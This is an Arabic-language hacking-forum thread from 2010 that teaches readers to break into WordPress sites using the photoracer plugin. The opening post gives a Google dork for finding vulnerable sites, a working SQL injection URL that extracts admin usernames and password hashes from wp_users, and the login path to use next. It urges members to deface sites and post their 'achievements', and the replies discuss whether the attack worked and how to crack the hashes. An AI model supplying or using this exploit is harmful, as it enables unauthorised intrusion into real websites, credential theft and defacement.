:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/forumdisplay.php?f=38)
-   -   WordPress v1.0 SQL Injection << تعال العب في سكربتات وردربرس هههه لوول (http://www.vbspiders.com/vb/showthread.php?t=30659)

Dr.NaNo 06-15-2010 03:16 PM
WordPress v1.0 SQL Injection << تعال العب في سكربتات وردربرس هههه لوول
 
السلام عليكم ورحمه الله وبركاته .

كيفكم . أخواني إن شاء الله الكل بخير ..


اليوم معي ، ثغرة حلوة في سكربتات وردربرس. إن شاء الله الكل يستفيد ،، من المواقع المصابــة .

ونبغى نشوف ،، قسم االإنجازات مليان مواقع مخترقه من قبلكم ياعناكبي . لوول ..


نبدأ بسم الله .:


أولا.:

الدوركـ .:

اقتباس:
inurl:"wp-content/plugins/photoracer/viewimg.php?id="
بتفتح قوقل كالعادة وبتحط الدورك وبتطلع لك مواقع واختار

اي واحد الي يعجبــك ..


ثانيــأ.:

الإٍستغلال .:

بتسوي كذا على طول ...:


اقتباس:
كود PHP:
wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users-- 
يعني مثال .:

www.xxx.com/

انت خذ الاستغلال الي فوق وحطـه بعد رابط الموقع وشوف وش يطلع لك..

بطلع لك الباسورد واليوزر تبع الادمن .. .:


مثال كامل . على الاستغلال .:


اقتباس:
www.xxx.com/
wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,us er_pass),7,8,9+from+wp_users--
فهمـتووو كيف ياحلوين ..





ثالثـأ.:

لوحـة التحكم .:

اقتباس:
www.xxx.com/wp-login.php
بس بتسوي بعد رابط الموقع هيك .:


اقتباس:
wp-login.php
وبتطلع لك لوحـة التحكم ..... لوول ..






يالله ، بدي اشوف اندكسات لوول..



أخوكم .:

كود PHP:
 Dr.NaNo 


بالتوفيــــــــــــــق لــكــم ..

Dr.NaNo 06-15-2010 06:40 PM
مثل ماقال فلكانو ،، بتمرون على الموضوع وماحد يرد ..

على العموم مشكوووووورين جميـــعا كل الي مرر بالصفحــة بشكرهم كثيررررررررر لو بدكم بوسسه على الراس مش مشكله .


سلاآآم

Marine 06-15-2010 07:00 PM
تشكراتي

بس الورد بريس هاشات صعبه

D-GhosT s3cur!Ty-Z 06-15-2010 07:41 PM
مشكووووووور ياغالي

hussin123 06-17-2010 08:06 PM
جربت كثر من موقع ولكن للاسف ولا موقع صار

NeTCaT-Ma 06-18-2010 01:30 AM
thank you brother

ubuntu 06-28-2010 03:50 PM
Dr.NaNo
لو*سمحت*ابي*اعرف*طريقة decrypte الورد*برس*باس*ورد
Thx to All

Zero 06-28-2010 07:29 PM
[align=center]جميل اخي شكرااا[/align]

mobdeen 06-28-2010 11:04 PM
والله ثغرة شغالة وتمام بس المشكلة الهاش كيف نفكه

وهي شغالة والمصابة اكثر

ubuntu 06-29-2010 06:35 AM
yes the wordpress hash is complicated :S

Sp1d3r 06-29-2010 09:07 AM
مشكور على الموضوع القيم

سلمت بداك

mr.ft 06-30-2010 12:27 PM
مشكووووووووووور يعطيك الف عافيه


الساعة الآن 03:22 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0